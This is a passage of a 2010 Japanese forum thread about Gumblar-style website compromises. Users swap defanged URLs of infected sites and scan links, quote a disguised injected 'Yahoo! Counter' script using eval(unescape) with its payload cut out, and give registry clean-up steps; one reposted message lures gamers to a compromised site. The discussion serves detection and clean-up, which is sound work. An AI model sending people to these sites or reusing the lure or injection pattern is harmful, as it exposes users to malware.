2010/05/08(土) 16:21:53ttp://blog○ceed○jp○?jp=kaspersky○filescanner○virusscanner
実はその前に
ttp://s02○megalodon.jp/2008-0922-1659-16/www○geocities○com/imomushi2005/imomushi20○htm
これを踏んで
Nine-Ball Mass Injectionがどうたらって警告が出たので
その対策を調べに来ていてやられました。マジ情けない…
0517名無しさん@お腹いっぱい。
2010/05/08(土) 16:26:01お前>>505だろwwwwwwwwwwww
だからURL貼り忘れたんだべwwwwwww他いけよもうw
0519名無しさん@お腹いっぱい。
2010/05/08(土) 16:31:510520名無しさん@お腹いっぱい。
2010/05/08(土) 16:33:13犯罪
0521名無しさん@お腹いっぱい。
2010/05/08(土) 16:41:42ばーか
0522名無しさん@お腹いっぱい。
2010/05/08(土) 16:46:15バカ
0523名無しさん@お腹いっぱい。
2010/05/08(土) 16:47:28連休疲れ?
0524名無しさん@お腹いっぱい。
2010/05/08(土) 16:54:24ハ _
___ ‖ヾ ハ
/ ヽ ‖::::|l ‖:||.
/ 聞 え | ||:::::::|| ||:::||
| こ ? | |{:::::‖. . .||:::||
| え | _」ゝ/'--―- 、|{::ノ!
| な 何 | / __ `'〈
| い ? ! /´ /´ ● __ ヽ
ヽ / / ゝ....ノ /´● i
` ー―< { ゝ- ′ |
厶-― r l> |
∠ヽ ゝ-― `r-ト、_,) |
レ^ヾ ヽ>' ̄ LL/ 、 /
.l ヾ:ヽ ` 、_ \\ '
l ヾ:ヽ ト`ー-r-;;y‐T^
| ヾ `ニニ「〈〉フ /‖. j
0525名無しさん@お腹いっぱい。
2010/05/08(土) 17:26:33違うんじゃないか
urlが中途半端に違う
このスレで踏んだ奴だろ
>>505は、=>>508=>>510
つーか規制食らったww
0526コテハン ◆8080adndqg
2010/05/08(土) 18:49:58最新版に更新済でも、JAVAの旧バージョンの残骸が残ってたりすると
やられてしまう可能性があるのです・・・
このスレの住人以外の方へ>
貼ってあるアヤシイURLは直接踏まず
【aguse Gateway】
http://gw.aguse.jp/
ここを使いましょう。
>aguse Gatewayとは?
スクリーンキャプチャを使った完全に安全なブラウザ型ゲートウェイです。
>サイトを1枚ずつキャプチャして見せ、ブラウザに準じた動作が可能です。
0527名無しさん@お腹いっぱい。
2010/05/08(土) 18:57:290528名無しさん@お腹いっぱい。
2010/05/08(土) 18:57:33あやしいhttp://www.example.com:8080/の:8080とかは検出してくれるけど
そこも注意深く見ないと安全なサイトにしか見えないし
0529名無しさん@お腹いっぱい。
2010/05/08(土) 19:31:17確か最初はネトゲのパスが抜かれてたような記憶がある
去年の夏ごろの上に出てたAsian motorsのサイトだったような気が、、、
てか、感染サイトのお知らせ、アンチウイルスサイトのアドレス貼って、そこ行け、で済ませてる所多いけど、
感染してたらウイルス除去、だけじゃ済まんだろ。
FTP以外のパス変えたり、クレカ会社に連絡しなきゃ、たとえクリーンストールしても、
意味無いような気がする。
0530名無しさん@お腹いっぱい。
2010/05/08(土) 19:49:03仮にもクレジットカード会社の取る行動じゃないよな
0531名無しさん@お腹いっぱい。
2010/05/08(土) 20:56:50VirusTotalだとどうなのだろう
0532名無しさん@お腹いっぱい。
2010/05/08(土) 21:01:570533名無しさん@お腹いっぱい。
2010/05/08(土) 21:07:170534名無しさん@お腹いっぱい。
2010/05/08(土) 21:11:34それ改ざんとはいわないだろ
要するに広告ブロックとかしたいんじゃないの
あとはぐぐれ
0535名無しさん@お腹いっぱい。
2010/05/08(土) 21:12:36そんな結論にはなってないとおもうよ
0536名無しさん@お腹いっぱい。
2010/05/08(土) 21:20:19KNOPPIXをDVD起動で使用
0537名無しさん@お腹いっぱい。
2010/05/08(土) 22:39:440538名無しさん@お腹いっぱい。
2010/05/08(土) 23:27:54広告ブロックではなく文章や写真を少しだけ変えて知り合いを驚かせたいんです。
そのためには管理者側としてソースコードを書き換える必要があると思うのですが
難しいのでしょうか?
ちょっとした自己掲示欲でウイルスを入れようなどは考えていません。
ここにいる人は詳しいと思ったのでここで質問させていただきました。
0539名無しさん@お腹いっぱい。
2010/05/08(土) 23:29:330540名無しさん@お腹いっぱい。
2010/05/08(土) 23:32:420541名無しさん@お腹いっぱい。
2010/05/08(土) 23:35:05失せろダニ
0542名無しさん@お腹いっぱい。
2010/05/08(土) 23:36:44( ゚,_ゝ゚)バカジャネーノ
0543名無しさん@お腹いっぱい。
2010/05/08(土) 23:41:140544名無しさん@お腹いっぱい。
2010/05/08(土) 23:43:05それは犯罪です
0545名無しさん@お腹いっぱい。
2010/05/08(土) 23:44:58これってここに貼ってあったやつだけど改竄されてるか?
今見たけどカスペもシマンテックもアバストも特に反応しねーが
0546名無しさん@お腹いっぱい。
2010/05/08(土) 23:46:53あまりにも幼稚な発想でこわいわ
お前がサイト持ってて突然改ざんされたら驚く程度では済まなくね?
恐怖感のほうが強いはず
ストーカーか何かなの?
軽いイタズラじゃ済まないよ
0547名無しさん@お腹いっぱい。
2010/05/08(土) 23:48:59上はこっそり修正したのかもしれん
Date: Sat, 08 May 2010 14:47:09 GMT
たぶんそのうちまた再改ざんされるんじゃね
0548名無しさん@お腹いっぱい。
2010/05/08(土) 23:49:29今は直ってるけど、少なくともhttp://blog●ceed●jp/は>>512が埋まってた
0549名無しさん@お腹いっぱい。
2010/05/08(土) 23:58:07なるほど、サンクス
修正はされたけどアナウンスはされてないのねw
0550名無しさん@お腹いっぱい。
2010/05/09(日) 00:14:37そのURL踏むとPC動作重くなったり何かファイル組みこんだりする?
0551名無しさん@お腹いっぱい。
2010/05/09(日) 01:40:48過去に踏んでしまったのならそういうこともあるかもしれません
0552名無しさん@お腹いっぱい。
2010/05/09(日) 02:08:06てめー24しとくわ
せいぜい家でマッポがいつくるかガクブルして待ってろ
0553名無しさん@お腹いっぱい。
2010/05/09(日) 02:08:16>514です。aguseで昨日の12:00頃調べた時には,>>512が検出されました。
Norton Safe Webで調べてみたところ、以前同サーバの別ページ?で
Bloodhound.Exploit.292の存在が確認されている模様。
パスワードやクレジットカード情報などを盗むウィルスに分類されているようですが
windows7への感染は無いっぽい?よく分からん。
0554名無しさん@お腹いっぱい。
2010/05/09(日) 13:22:54IPAかJPCERTのGumblarにかかったらどうするかって所に
・公表する
・ホームページの管理者なら、いつからいつまでの間ウィルスが埋め込まれていたのか明らかにする
って内容があった気がする
>>516の上は最低だな
0555名無しさん@お腹いっぱい。
2010/05/09(日) 13:48:150556名無しさん@お腹いっぱい。
2010/05/09(日) 15:00:07ttp://www.lac.co.jp/info/alert/ks_talk20100326.html
0557名無しさん@お腹いっぱい。
2010/05/09(日) 15:50:45まあそういうことをやるとこはポカするたびにこっそり書き換えとかやって段々信用を無くしてくよ
セキュリティ関係ないけどアクティスの電源とかな
0558コテハン ◆8080adndqg
2010/05/09(日) 16:18:44slmo●co●jp/
www●hd-cre●com/ ←ここはやられてないけど・・・
↓
www●google●co●jp/search?hl=ja&q=site%3Ahd-cre●com%2F&btnG=%E6%A4%9C%E7%B4%A2&lr=
0559名無しさん@お腹いっぱい。
2010/05/09(日) 16:20:32こりか。
ttp://samspade.org/whois/honeywhales.com
0560名無しさん@お腹いっぱい。
2010/05/09(日) 16:36:48>>556
>>559
これはおそらく自演
迂闊に踏むなよ
0561名無しさん@お腹いっぱい。
2010/05/09(日) 16:51:54まぁ外部から興味本位で来て引っ掛かった奴は「ご愁傷さまだ、さっさとクリーンインストールして来い」で良いと思う
0562名無しさん@お腹いっぱい。
2010/05/09(日) 17:08:55馬鹿じゃないの
0563名無しさん@お腹いっぱい。
2010/05/09(日) 17:45:35段々信用をなくすって言うけど元からないだろう。こういうとこは。
0564名無しさん@お腹いっぱい。
2010/05/09(日) 17:51:24ご愁傷さま
0565名無しさん@お腹いっぱい。
2010/05/09(日) 20:42:15アンカーつけると削除依頼が通らなくなるぞ
0566名無しさん@お腹いっぱい。
2010/05/09(日) 21:50:140567名無しさん@お腹いっぱい。
2010/05/09(日) 22:42:05アンカーつけるところまで自演じゃないの?
0568名無しさん@お腹いっぱい。
2010/05/10(月) 00:32:44傑作な改竄修正。
管理人は一体何を考えているんだ…
0569名無しさん@お腹いっぱい。
2010/05/10(月) 03:25:34//12Apr2010 : Malware script
ところどころコメントアウトしてあったり、なかったりw
0570名無しさん@お腹いっぱい。
2010/05/10(月) 03:42:17久しぶりすぎる
0571名無しさん@お腹いっぱい。
2010/05/10(月) 05:37:59下 >ホームページに関するお詫びとお知らせ
0572名無しさん@お腹いっぱい。
2010/05/10(月) 10:41:22ruドメインとcnドメインのサイトは全て危険とみなしてよいのでしょうか?
0573名無しさん@お腹いっぱい。
2010/05/10(月) 11:39:45ブラジルとか最近spamの温床になってきてる新興国や発展途上国なんかは要注意だね
0574名無しさん@お腹いっぱい。
2010/05/10(月) 12:56:05そのうちcomとかjpもできるんじゃないかね
0575名無しさん@お腹いっぱい。
2010/05/10(月) 13:03:32comは既にあるらしい
「.ru」ドメイン対策では防げない「Gumblar」攻撃 - マルウェア配布サイトに「.com」などが
http://www.security-next.com/012509.html
0576名無しさん@お腹いっぱい。
2010/05/10(月) 13:57:51stompstamp●com
0577名無しさん@お腹いっぱい。
2010/05/10(月) 15:19:55全部危険ってわけじゃないだろ。
McAfeeは毎年危ないTLDを発表してるが、2009年は
cm(カメルーン)
com(gTLD)
cn(中国)
ws(サモア)
info(gTLD)
の順だった。
PDF www.mcafee.com/common/media/mcafeeb2b/international/japan/pdf/threatreport/2009_MTMW_Report.pdf
cnは昨年12月14日から、ruは4月1日から登録が面倒になった(書類審査)。
今後は他のが増えてくるんじゃね。
0578名無しさん@お腹いっぱい。
2010/05/10(月) 17:15:580579名無しさん@お腹いっぱい。
2010/05/10(月) 17:29:13ちょっと確認してもらえないか
0580名無しさん@お腹いっぱい。
2010/05/10(月) 17:30:33ここはそういうスレじゃない
0581名無しさん@お腹いっぱい。
2010/05/10(月) 18:01:05bloodhound.exploit.292
>>580
死ね
>>553
0582名無しさん@お腹いっぱい。
2010/05/10(月) 18:43:41>>1も読まないやつに答えるなよ
そういうことするからまた同じバカが出てくるんだろ
0583名無しさん@お腹いっぱい。
2010/05/10(月) 19:27:43>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
0584名無しさん@お腹いっぱい。
2010/05/10(月) 19:37:25GJ!
0585名無しさん@お腹いっぱい。
2010/05/10(月) 19:57:32ftpだけでなく動画サイトやネット接続のID、パスワードも抜かれるのだろうか
0586名無しさん@お腹いっぱい。
2010/05/10(月) 20:33:10サイト持ちです。
このサイトはコンピュータに損害を与える可能性があります
グーグルでこの表示が出たとの知らせをうけて、該当ページから挿入されたスクリプトを除去し、再アップしました。
しかしながら、今後も同様のケースが考えられるので根底から対処しないといけないということです。
ウイルス除去タイプのプロバイダーを使っていたので、今まで安心していました。
今後サイトに変なスクリプトが挿入されないようにするには、どういった対処がおすすめでしょうか。
皆さんの意見をお願いします。※スレチであれば、誘導もお願いします。
0587名無しさん@お腹いっぱい。
2010/05/10(月) 20:38:100588名無しさん@お腹いっぱい。
2010/05/10(月) 20:39:12ttp://www.ipa.go.jp/security/topics/20091224.html
0589名無しさん@お腹いっぱい。
2010/05/10(月) 20:48:13あなたのPCに何か感染していますので
とっととクリーンインストールしてください。
0590名無しさん@お腹いっぱい。
2010/05/10(月) 21:05:18ネット接続のパス抜かれたら終わりだ・・・
Gumblarで実際にそうなるのかねえ
0591名無しさん@お腹いっぱい。
2010/05/10(月) 21:12:27通信を監視していますので非セキュアな通信はすべて筒抜けです
0592名無しさん@お腹いっぱい。
2010/05/10(月) 21:15:28セキュリティ対策ソフト入れないってのはありえないわ
根底から対処っていうのはOS入れなおせっていう意味だよ
0593名無しさん@お腹いっぱい。
2010/05/10(月) 21:35:29最悪ネット接続すら出来ないのか gkbr
0594名無しさん@お腹いっぱい。
2010/05/10(月) 21:36:54煽るのもいいけど、FTPのパスワードは最低変えておけぐらい言えばいいのに
0595名無しさん@お腹いっぱい。
2010/05/10(月) 21:43:00よく分からんなFWは無力なのか?
0596名無しさん@お腹いっぱい。
2010/05/10(月) 21:49:40http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
特に利用者の告知は必須。
ウイルスのチェック方法等をあわせて告知しないと、被害が拡大する↓
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1440009934
0597名無しさん@お腹いっぱい。
2010/05/10(月) 21:51:25感染PCから変えても無駄だろ
0598名無しさん@お腹いっぱい。
2010/05/10(月) 21:55:13対処します。ありがとうございました。
0599名無しさん@お腹いっぱい。
2010/05/10(月) 21:58:08ISPからの個人あてメールも削除おすすめ・・・かも
0600名無しさん@お腹いっぱい。
2010/05/10(月) 22:08:590601名無しさん@お腹いっぱい。
2010/05/10(月) 22:33:180602名無しさん@お腹いっぱい。
2010/05/10(月) 22:36:250603名無しさん@お腹いっぱい。
2010/05/10(月) 23:06:120604名無しさん@お腹いっぱい。
2010/05/10(月) 23:29:19だからといって、一太郎や花子に脆弱性が無いという保障にはならない
0605名無しさん@お腹いっぱい。
2010/05/10(月) 23:31:590606名無しさん@お腹いっぱい。
2010/05/10(月) 23:44:53あとATOKも
0607名無しさん@お腹いっぱい。
2010/05/10(月) 23:58:33sound●jp/kimitoiumizunonakade/
fourlcp●com
>>576
色々やってみた
上:
ttp://www.virustotal.com/jp/analisis/f942bb71aab5e4fd70839417e7d82d4334bfd7e8350ca1437dfd826ac84b9041-1273501485
下(全部):
ttp://www.virustotal.com/jp/analisis/f40f4aa1ed6196b33132a4d3d8d8c6bcefb160e3fbc5798a6ac7ade730cd6170-1273501248
下(<script></script>のみ):
ttp://www.virustotal.com/jp/analisis/4d73584fc0a3087cc58028a4eeac405f94204f62bb60d12f747e8de13ab5d204-1273502164
swfobject.js:
ttp://www.virustotal.com/jp/analisis/7118a6aa10d05e5d773b6080a83889a5cc9b387701f8d0b1acfd62618a560392-1273485048
「「Gumblar」関連のウイルスがランキング上位に - 「一太郎」狙いのゼロデイ攻撃も」
ttp://www.security-next.com/012526.html
0608名無しさん@お腹いっぱい。
2010/05/11(火) 00:03:47MSE使えねー
0609名無しさん@お腹いっぱい。
2010/05/11(火) 00:17:32myako●net
昨日だけで9000人以上が閲覧
早急にどうにかしないとまずいのに何度メール送ってもスルーされる…
0610名無しさん@お腹いっぱい。
2010/05/11(火) 00:25:15確認できないんだが
0611名無しさん@お腹いっぱい。
2010/05/11(火) 00:39:59こちらの環境でも現在は修正及びサブドメインは403にされている模様です。
0612名無しさん@お腹いっぱい。
2010/05/11(火) 00:43:59残ってた>>445 Last-Modified: Sun, 11 Apr 2010 21:36:14 GMT
alienear●ru
0613名無しさん@お腹いっぱい。
2010/05/11(火) 00:54:14aguseじゃでなかったけどgredだとでたぞ
0614名無しさん@お腹いっぱい。
2010/05/11(火) 01:18:41ここの
myako.net/download/down2.cgi
これがやられてるね。
myako.net/download/kensakumdl.js
0615名無しさん@お腹いっぱい。
2010/05/11(火) 01:23:15myako.net/juke.html
myako.net/java2/amophoto/photo.html
この辺も
0616名無しさん@お腹いっぱい。
2010/05/11(火) 01:28:26ここ全部やられてる
0617名無しさん@お腹いっぱい。
2010/05/11(火) 01:33:17結構出入りの多そうなサイトだし…HP作成のjs配布サイトってw
0618名無しさん@お腹いっぱい。
2010/05/11(火) 01:35:40>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
>>609
myako●net [219●94●128●187] www947●sakura●ne●jp
>>7のさくらにつーほーすますた。
0619名無しさん@お腹いっぱい。
2010/05/11(火) 01:36:47乙です
0620名無しさん@お腹いっぱい。
2010/05/11(火) 01:38:490621613
2010/05/11(火) 01:52:32俺もAVは入れて無いんだけどね
0622名無しさん@お腹いっぱい。
2010/05/11(火) 01:56:38ttp://www.google.com/url?q=http%3A%2F%2Fonline%2Eus.drweb%2Ecom%2Fresult%2F%3Furl%3Dhttp%253A%252F%252Fmyako%252Enet%252Fshop%252Findex%252Ehtml
0623このV誰のV ◆yUyb3Tqn92
2010/05/11(火) 04:45:26477 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:33:22 ID:38FsBWE+0
>>476
法則にそってレアアイテム手に入れる方法あるぞ
http://myako.net
チート嫌いなら別だがね
478 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:34:48 ID:Zp72kWEj0
>>477
裏技でプレイするのは最後の手段だろ
479 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:36:01 ID:ZTLYXdOv0
>>477
そんな法則あったんだな、今2匹目で普通に出ちゃったから別ので詰まったら試してみよう
480 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:37:56 ID:YMFIRoo+0
しっぷう、しっぷう、ラウンドゼロ
これマジでどうすりゃいいの?
たまに当たっても何もできないまま負けるんだけど…
481 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:38:05 ID:Zp72kWEj0
>>479
握手しよう
482 :(VдV) ◆yUyb3Tqn92 :2010/05/11(火) 04:40:33 ID:Zp72kWEj0
Д< クククク、引っかかったな愚かな勇者ども
0624このV誰のV ◆yUyb3Tqn92
2010/05/11(火) 04:48:55620 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:27:31 ID:HJ28nnYh
>>618
ぱくり乙
http://sound.jp/kimitoiumizunonakade/
自分の意見みたいに言うなよks
621 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:27:47 ID:qRZV9Fiz
>>615
そこ、本当にお前の村かよw
「HOME」付きのSSを晒せよw
622 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:28:48 ID:JReWC+AX
>>620
スペック晒してるから
いつ攻められてもおかしくないだろこれ
0625名無しさん@お腹いっぱい。
2010/05/11(火) 04:51:180626八頭 ◆YAGApwSaEw
2010/05/11(火) 06:32:48hatoyamakoji●com
0627名無しさん@お腹いっぱい。
2010/05/11(火) 07:53:56hatoyamakoji●com [59●106●13●145] www495●sakura●ne●jp
>>7のさくらにつーほーすたー。
0628名無しさん@お腹いっぱい。
2010/05/11(火) 14:30:34これ踏んでしまった。
何かマズいものあります?
0629名無しさん@お腹いっぱい。
2010/05/11(火) 16:20:150630名無しさん@お腹いっぱい。
2010/05/11(火) 16:33:14あーあ、やっちゃったね
ご愁傷様
0631名無しさん@お腹いっぱい。
2010/05/11(火) 16:58:060632名無しさん@お腹いっぱい。
2010/05/11(火) 17:02:54ガンブラーだったんですか?
OSクリーンインストールしないとマズイんでしょうか?
0633名無しさん@お腹いっぱい。
2010/05/11(火) 17:16:300634名無しさん@お腹いっぱい。
2010/05/11(火) 17:18:45>>633さんもこんなに怒ってるんだぞ
0635名無しさん@お腹いっぱい。
2010/05/11(火) 17:21:29ゴチャゴチャ書いてるの読むのメンドいから説明してよ
>>2とか意味わかんないし既存のセキュリティソフトでは何の意味も無いってこと?
0636名無しさん@お腹いっぱい。
2010/05/11(火) 17:32:02PCごと捨てちゃえばメンドくなくて簡単だよ!
0637名無しさん@お腹いっぱい。
2010/05/11(火) 17:32:28お前アタマ悪いだろ?
0638名無しさん@お腹いっぱい。
2010/05/11(火) 17:35:29本当に感染してしまったんでしょうか
0639名無しさん@お腹いっぱい。
2010/05/11(火) 17:35:53>>2読んでも理解できなければPC捨てた方がいいじゃない?^^
0640名無しさん@お腹いっぱい。
2010/05/11(火) 17:38:32テンプレ任せでよく分かってない奴が居着いて煽ってるんじゃ話にならんな
0641名無しさん@お腹いっぱい。
2010/05/11(火) 17:43:53ruドメインとcnドメインのアドレスのサイトが危険な傾向にあるというだけで
そのドメインがアドレスに無いロシアのサイトや中国のサイトが危険というわけではないのですね
0642名無しさん@お腹いっぱい。
2010/05/11(火) 17:46:11日本語で
0643名無しさん@お腹いっぱい。
2010/05/11(火) 17:53:44ロシアのサイトでもruドメインではないサイトがあるけど
そういう場合は危険なのかという話
0644名無しさん@お腹いっぱい。
2010/05/11(火) 17:55:52元のドメインがどこかは関係ない
0645名無しさん@お腹いっぱい。
2010/05/11(火) 18:07:46したくないとかそういう意思の問題じゃないです
とりあえずスキャンしてみればいいじゃない
0646名無しさん@お腹いっぱい。
2010/05/11(火) 18:27:00gumblerに感染してしまった場合
感染の確認方法はあるのでしょうか
また最近のgumblerに感染するとどんな症状が出たりするのでしょうか?
もちろん>>2は怠っていません
0647名無しさん@お腹いっぱい。
2010/05/11(火) 18:28:45だからテンプレにあることしとけばいい
ゼロデイなんて言っても、実際になにか起こる前にはここが狙われそうだから気をつけようとか前段階で話がされるもんだし、その情報に気を配って設定してればおk
0648名無しさん@お腹いっぱい。
2010/05/11(火) 18:45:21まぁID出ない上gumblerを自演で意図的にばら撒いてるヘンなのまでいるんだからそういう粘着の類が居てもおかしくは無いのか
0649名無しさん@お腹いっぱい。
2010/05/11(火) 18:49:11マジで昨日まで大丈夫だったサイトが今日見たらGumbler移ってました、ってのが
ありえるからな……
危機管理の無い「自分だけは大丈夫」って思ってるサイト持ちの奴がどんどん広めてて、
ネットサーフィンする以上避けようがない
もうビクビクするならネット見るな、のレベル
0650名無しさん@お腹いっぱい。
2010/05/11(火) 18:49:39>>646はそのPCが感染してるかどうかの確認方法を聞きたいんじゃないか?
0651名無しさん@お腹いっぱい。
2010/05/11(火) 18:56:02信頼できる情報は専門家から金を出して買え
0652名無しさん@お腹いっぱい。
2010/05/11(火) 19:01:250653名無しさん@お腹いっぱい。
2010/05/11(火) 19:02:59あ、いや別に>>646にレスしたわけじゃない
しかも>>647はほとんど願望、素人のこうであってくれと言う嘆きでしかない
0654名無しさん@お腹いっぱい。
2010/05/11(火) 19:09:29言い出しっぺの法則
0655名無しさん@お腹いっぱい。
2010/05/11(火) 19:46:43確認方法はスキャンしてみるって程度
様々なマルウェアをDLするのでそのどれかがスキャンにひっかかるはずという理由
FTP設定ファイルの検索、通信の盗聴、一時期は特定サイトへの攻撃などあったけど
目に見えてわかりやすい症状がでるかというとたぶんない
偽セキュリティソフトのインストールも確実にされるかはわからんしなあ
0656名無しさん@お腹いっぱい。
2010/05/11(火) 19:48:26何がわからないのかいってくれないと回答しようがないじゃない
質問の大半が「感染したのでしょうか?」なんだから
心配ならOS入れなおせとしか言えないよ
0657名無しさん@お腹いっぱい。
2010/05/11(火) 19:51:23以前はPC動作が重い、chmファイル改ざんと分かりやすかったのになあ
0658名無しさん@お腹いっぱい。
2010/05/11(火) 19:57:05msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
この確認方法も今は通用しないのか
0659名無しさん@お腹いっぱい。
2010/05/11(火) 20:04:01HKLMとHKCUの\SOFTWARE\Microsoft\Windows\CurrentVersion\Run辺りで
常駐させてると思うからそこになければ平気な気がするけど
無ければ絶対問題無いといい切れないのが、進化し続けるウィルス
0660名無しさん@お腹いっぱい。
2010/05/11(火) 20:19:26gumblerに感染したかの確認って言ってるけどgumblerで入ってくるマルウェアは一種類じゃないし
改竄されたサイトに>>2を怠って接続したりしたら勝手にマルウェアをダウンロードされてインストール
されるってこと
入ってくるマルウェアがダウンローダー系だったら色んなワームやら偽セキュリティーソフトがダウンロードされるわけだし
ウイルス対策ソフト入れてたって検出されないやつだったらそのまま入ってきてインストールされるしね
確認方法なんて走ってる怪しいProcessの確認とか、レジストリーのrunキーの確認とか今までの既存のウイルスの感染確認しかない
アンチウイルスソフト最新にして>>2をやる以外に対策はない
ネット使ってて絶対に感染しない対策なんてそもそもないし
それでも不安ならRITURNILでも使ってサイト閲覧は全部仮想化してやるとか
ユーザーの了解なく勝手にダウンロードされてインストールされるのがgumblerの怖いところだよねぇ
0661名無しさん@お腹いっぱい。
2010/05/11(火) 20:20:59重くなるのはスペック次第じゃないかな
今も低スペックなら重くなるかもしれない
>>658
ファイル名なんてすぐ変更できるから意味がないよね
>>659
初期Gumblarはドライバ部分じゃなかったっけ?
0662名無しさん@お腹いっぱい。
2010/05/11(火) 20:24:10QuickTime無しでmp4やmov形式見られる他のプレイヤーもほとんど無いし
0663名無しさん@お腹いっぱい。
2010/05/11(火) 20:44:51alternativeでコーデックだけインストールしてブラウザのプラグインはインストールしないというやり方のほうが
いいと思うのだが
0664名無しさん@お腹いっぱい。
2010/05/11(火) 20:57:560665名無しさん@お腹いっぱい。
2010/05/11(火) 21:00:11つかってなくてもアップルさんが入れろっていうから…
0666名無しさん@お腹いっぱい。
2010/05/11(火) 21:04:46Alternativeのコーデックは他の一部プレイヤーで不都合ありだからなあ
ttp://www.katch.ne.jp/~kakonacl/douga/winplayer/winplayer2.html
0667名無しさん@お腹いっぱい。
2010/05/11(火) 21:20:36Quicktimeは現時点で攻撃目標にされてないだけで、
今後何があるかわからん
0668名無しさん@お腹いっぱい。
2010/05/11(火) 21:23:13病気かよ
0669名無しさん@お腹いっぱい。
2010/05/11(火) 22:24:26movファイルとかまず使わんしmp4はffdshowでも入れておけばいいし
0670名無しさん@お腹いっぱい。
2010/05/11(火) 22:27:25必要な人もいるんだろ
0671名無しさん@お腹いっぱい。
2010/05/11(火) 22:29:52偉そうに語るやつが多いな
0672名無しさん@お腹いっぱい。
2010/05/11(火) 22:34:24>>670
>>671
0673名無しさん@お腹いっぱい。
2010/05/11(火) 22:41:030674名無しさん@お腹いっぱい。
2010/05/11(火) 22:44:160675名無しさん@お腹いっぱい。
2010/05/11(火) 22:44:48馬鹿得意のコピペ
0676名無しさん@お腹いっぱい。
2010/05/11(火) 22:48:270677名無しさん@お腹いっぱい。
2010/05/11(火) 22:57:410678名無しさん@お腹いっぱい。
2010/05/11(火) 22:59:40攻撃にも使われてないのに使うななんていうのはありえねえ
そんこと言ったら何も使えん
0679名無しさん@お腹いっぱい。
2010/05/11(火) 23:03:23いちゃもんつけて
スレの流れ切ってんのはお前だろすっこんでろw
0680名無しさん@お腹いっぱい。
2010/05/11(火) 23:46:35無知でサーセン
0681コテハン ◆8080adndqg
2010/05/12(水) 01:15:42VLC Media Playerはどないだ?
再生可能なやつ↓
MPEG、AVI、ASF、WMV、WMA、MP4、MOV、3GP、OGG、OGM、Annodex、MKV
WAV、DTS、AAC(m4a)、AC3、A52、Raw DV、FLAC、FLV、MIDI、SMF、MXF・・・
0682名無しさん@お腹いっぱい。
2010/05/12(水) 01:33:41MediaPrayerClassicも仲間に入れてあげてください
0683名無しさん@お腹いっぱい。
2010/05/12(水) 01:41:490684名無しさん@お腹いっぱい。
2010/05/12(水) 02:06:12> VLC Media Playerはどないだ?
VLCの現行配布バイナリは 0-day 持ち。
Fix済みソースはリリースされてんのに、
なかなかバイナリがでない。
0685名無しさん@お腹いっぱい。
2010/05/12(水) 02:12:06現行バイナリは1.0.5。fix済みは1.0.6
0686名無しさん@お腹いっぱい。
2010/05/12(水) 02:12:480687名無しさん@お腹いっぱい。
2010/05/12(水) 04:46:29>サーバのファイルにスパイウェアを仕掛けられたため
えぇー
0688名無しさん@お腹いっぱい。
2010/05/12(水) 05:30:090689名無しさん@お腹いっぱい。
2010/05/12(水) 10:30:48自分でダウンロードした覚えのないモノ迂闊に開かない限り問題無いと思うんだけどねぇ
そんなホイホイ不審なファイル開くのって山田オルタナにも感染しそうだ
0690名無しさん@お腹いっぱい。
2010/05/12(水) 12:21:330691名無しさん@お腹いっぱい。
2010/05/12(水) 12:28:320692名無しさん@お腹いっぱい。
2010/05/12(水) 13:16:18俺はSM PLAYERも仲間に入れてね
0693名無しさん@お腹いっぱい。
2010/05/12(水) 13:53:280694名無しさん@お腹いっぱい。
2010/05/12(水) 17:02:33これひどいな
サイト主のやる気とか関係なく、後始末ぐらいはちゃんとしろよ
>>607の一番上も403にしただけだし、、、
まあこの後ちゃんと対策含めた告知出すのかもしれんが
0695名無しさん@お腹いっぱい。
2010/05/12(水) 18:55:06JRとか競馬場のとこですら「てめーらで勝手にウィルススキャンして対処して下さいね」としか言ってないし
0696コテハン ◆8080adndqg
2010/05/12(水) 19:59:24www●fukuyama-flowerlc●com/
pinkhost●web●fc2●com/i/more06/
ところで、myako●netは再開するつもりなのかにゃ?
0697名無しさん@お腹いっぱい。
2010/05/12(水) 20:21:260698名無しさん@お腹いっぱい。
2010/05/12(水) 21:00:44再開してるね。
>スパイウェアで攻撃されたため全削除しました(><)
>初心者に優しいスクリプトを再度どのくらいまでできるかわかりませんが配布します
>順次再構築していきますので時々覗いてみて下さい
またやられそう
0699名無しさん@お腹いっぱい。
2010/05/12(水) 21:39:47現時点でGumblarで利用されていないが
今日重大な脆弱性の修正バージョンがリリースされているので
入れてるなら更新した方がいいし、入れてるだけで使ってないなら削除した方がいい
0700名無しさん@お腹いっぱい。
2010/05/12(水) 21:54:37infom●biz/secretdiet
0701名無しさん@お腹いっぱい。
2010/05/12(水) 22:20:27<script language=javascript><!-- Yahoo! Counter starts here-->if(typeof(yahoo_counter)!=typeof(1))eval(unescape(' <--省略--> );var yahoo_counter=1;<!-- counter end --></script><!-- counter end--></script>
上記部分だけ抜き出して投げてみた
http://www.virustotal.com/jp/analisis/7b35db5445fbcbf92d47775897ed438c22184c7b8b502196ff7dc18e7e9e82ae-1273664704
0702名無しさん@お腹いっぱい。
2010/05/13(木) 02:44:34あれからウイルス駆除ソフトでチェックをして、見つかったものを削除。
あわせて、>>658をみて、siszyd32.exeとTMD.tmpがないことを確かめました。
FTPはレンタルサーバーのものを使っているのでパスはありません。
一応これで安心でしょうか? >>2も対処しました。ご教授お願いします。
0703名無しさん@お腹いっぱい。
2010/05/13(木) 03:10:450704名無しさん@お腹いっぱい。
2010/05/13(木) 03:20:47スキャンはあくまで目安であり完全に除去できるものではありません
OSの入れなおしをしてください
